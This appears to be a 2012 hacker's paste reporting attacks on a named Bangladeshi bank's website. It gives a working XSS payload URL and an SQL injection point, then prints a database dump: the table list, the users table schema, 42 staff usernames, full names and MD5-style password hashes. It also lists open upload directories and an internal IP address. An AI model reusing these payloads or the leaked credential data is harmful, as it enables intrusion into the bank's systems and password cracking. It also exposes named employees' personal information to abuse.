human_mind_cracker

report2: bangladesh bank

Oct 28th, 2012
**********************************************************************************************

[*] Target: www.islamibankbd.com

[**] Cross-site Scripting:

http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E

(works on Mozilla Firefox)

[**] SQL injection:

http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'

[****] Information Leaked from their database:

database: MySQL

[*] Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'

available databases [2]:
[*] information_schema
[*] islamidb

Database: islamidb
[74 tables]
+--------------------------+
| annualreport             |
| ar_cat                   |
| area                     |
| articles                 |
| atm                      |
| atm_area                 |
| atm_location             |
| audit_committee          |
| board_of_directors       |
| books                    |
| branchdtls               |
| branches                 |
| chairman_corner          |
| charge_commision         |
| corporate_info           |
| currencyrate             |
| currencyrate0            |
| deposit_scheme           |
| deposit_scheme_info      |
| dept                     |
| disclosure               |
| district                 |
| download                 |
| dynamicsections          |
| email                    |
| eventdetails             |
| eventdetails_11          |
| eventdetails_111         |
| events                   |
| executive_committee      |
| feb_aof_info             |
| feb_crsp_info            |
| feb_csc_info             |
| feb_nrb_info             |
| feb_rema_info            |
| feb_repa_info            |
| fex_graph                |
| interview                |
| investment               |
| jobcategory              |
| jobdetails               |
| keypersonal              |
| link                     |
| link_cat                 |
| management               |
| managementdetails        |
| manager_info             |
| md_corner                |
| md_news                  |
| md_publication           |
| news                     |
| notice                   |
| orderby                  |
| orderplacement           |
| paidup_capital           |
| personnel                |
| photo_album              |
| price_sensative_headline |
| privilege                |
| profit_rate              |
| publication              |
| qryjobs                  |
| rds_perform_details      |
| rds_perform_heading      |
| shariahcouncil           |
| shariahdetails           |
| sme_info                 |
| sme_prd_info             |
| sme_zone                 |
| sponsors                 |
| sysvalues                |
| userrights               |
| users                    |
| video                    |
+--------------------------+

Database: islamidb
Table: users
[13 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| Address     | varchar(50)  |
| BranchName  | varchar(50)  |
| Depertment  | varchar(50)  |
| Designation | varchar(50)  |
| Email       | varchar(50)  |
| FullName    | varchar(50)  |
| IsActive    | tinyint(4)   |
| Mobile      | varchar(50)  |
| Password    | varchar(255) |
| Phone       | varchar(50)  |
| UserID      | int(11)      |
| UserName    | varchar(50)  |
| UserType    | char(1)      |
+-------------+--------------+

Database: islamidb
Table: users
[42 entries]
+------------------+
| UserName         |
+------------------+
| atmadmin         |
| atmimran         |
| bcdadmin         |
| bcdraquib        |
| borhan           |
| bpmdadmin        |
| bpmdnizam        |
| bpmdsaiful       |
| bsadmin          |
| bsahashan        |
| bsfoysal         |
| chairmanadmin    |
| chairmanuser     |
| dsd              |
| ecsdadmin        |
| ecsdjahangir     |
| fadadmin         |
| fadshaheduzzaman |
| hrdabrar         |
| hrdadmin         |
| hrdahsan         |
| hrdmaquddus      |
| ibwadmin         |
| ibwmonir         |
| ictdwebadmin     |
| khademibw        |
| mdsadmin         |
| mdsmohtasim      |
| mkamal           |
| prdadmin         |
| prdhumayan       |
| rcidadmin        |
| rddadmin         |
| rddmashiul       |
| rddthohid        |
| rdsadmin         |
| rdsuser          |
| shaheduzzaman    |
| shareadmin       |
| sharerozaer      |
| shariahadmin     |
| shariahhabib     |
+------------------+

Database: islamidb
Table: users
[42 entries]
+-------------------------------+
| FullName                      |
+-------------------------------+
| Admin of HRD                  |
| Ahsan Habib                   |
| Habibur Rahman                |
| Humayan Rashid                |
| Imran                         |
| Ismail                        |
| Jahangir Hossain              |
| Md. Atiqur Rahman khan Khadem |
| Md. Borhan Uddin              |
| Md. Mashiul Alam              |
| Md. Mostofa Kamal             |
| Mohammd Thohidul Islam        |
| Muhammad Abdul Quddus         |
| Omar Foysal                   |
| Qazi Mohammed Shamsul Abrar   |
| Rozaer Hossain                |
| S M Abdur Raquib              |
| Saiful Islam                  |
| Shaheduzzaman                 |
| Super Admin                   |
+-------------------------------+

Database: islamidb
Table: users
[42 entries]
+----------------------------------+
| Password                         |
+----------------------------------+
| 01e8565004e20ebaaee5d1e948cc0f03 |
| 04dcef1b1d1ffff2a2c1f6f31e42348a |
| 0d308e5cfbb51143225b884c2d56167e |
| 0ed377bde3c3a6a3b3c9b8f49c81bcac |
| 119cbed0296edd3415f73ca21d695eb4 |
| 13cf6dd79b3e7d7d398f11a567a0a1b5 |
| 178b0c400e3cbc03418ee64e7af71b6e |
| 2651cea9b74c51aacdbcc1396ce5bfb7 |
| 3d3993a6ece38d0c10b155d5facf78e7 |
| 3eeb8d98c5dba5919eaed3f93bc317e6 |
| 3fb85c9f03577600bc8ba6e2e25a44d5 |
| 46f1eeae56bdf1077e1890cf8c8384a3 |
| 48cda072801bb304a08aaa19cae8ece6 |
| 4c1f0b5771136bf504f8d72144fc0972 |
| 5135cebb53ab8a028f9d16d48ca9f5f5 |
| 6013ee7dc437d4b10b211110ebeb5dc4 |
| 639aa761eb8cdaaf132c98460c3a92be |
| 641e4550176313cfcb7004dc6657c54c |
| 731c4cece807f681524eeb3c00c075c8 |
| 738a639acd1502c515d2ba9a980162e8 |
| 7e242f8c51fdb0b1a754bcdec21d0532 |
| 806938e17a140d0a2847c6d4a7e88e8c |
| 8336f298fed5901d2c58c4c3a0be0522 |
| 86d7ffa824672126bd183a8961d95a1e |
| 8e099fb1fd7804e63e29ca180853f1a3 |
| 9e044b89f318c8848d18ad0f8a64d309 |
| 9f6b071e1e1c75a380a99972fd1d6c87 |
| a06ea6415499e6fc813cdb756da9fdb6 |
| b31d1d300bd4d9438a59169c08535682 |
| bd06b23acb9d8f84149500333cc1c7cc |
| bd596577eefdf3a60b314512035d7de8 |
| bed407e0a32fdd46b71722c11991d9c3 |
| cca35a0265721f5ab431821a745056af |
| d6dec0fde9d68bb607d25b84d45059f0 |
| da1f2fbf9b96c7160869c785b8de4bd6 |
| da7c5f47b4c492545aa55ec5887989a1 |
| db502e13cc0ad9b22440223c095bcdaf |
| e2e796c8d2f15e6eeae1498e063996d1 |
| ecdc03a40c52f1a387cb44ddf5740e5d |
| f099cd5a70853ec7de964fdbb7027bb9 |
| f28d90f403abe8c509aca6bd73930e8f |
| f3c94f7cece18ac86ede31265f24a2e7 |
+----------------------------------+

[**] Directory Listing Enabled:

Directory listings allow attackers to get a better understanding of the server and the application structure. In some situations directory listings may reveal resources which are not supposed to be known.

[-] solution: Disable directory listings.

url: http://www.islamibankbd.com/upload_dir/photo_album/

url: http://www.islamibankbd.com/upload_dir/newsimages/

url: http://www.islamibankbd.com/feedback/

url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/

url: http://www.islamibankbd.com/upload_dir/fex_graph/

url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/

url: http://www.islamibankbd.com/feedback/images/

[**] IP Disclosure:

The server or application disclosed internal network information. This information could be used by attackers to make an educated guess about the internal or external network topology. Leaked IP addresses could be used as a stepping-stone to more complex attacks.

[-] solution: Ensure that sensitive information such as internal or external IP addresses is safely guarded. Unless there is a good reason, prevent the disclosure of network information.

ip: 192.168.0.69

[**] Email leaked:

[****] Picture:
http://www.imagup.com/data/1166122796.html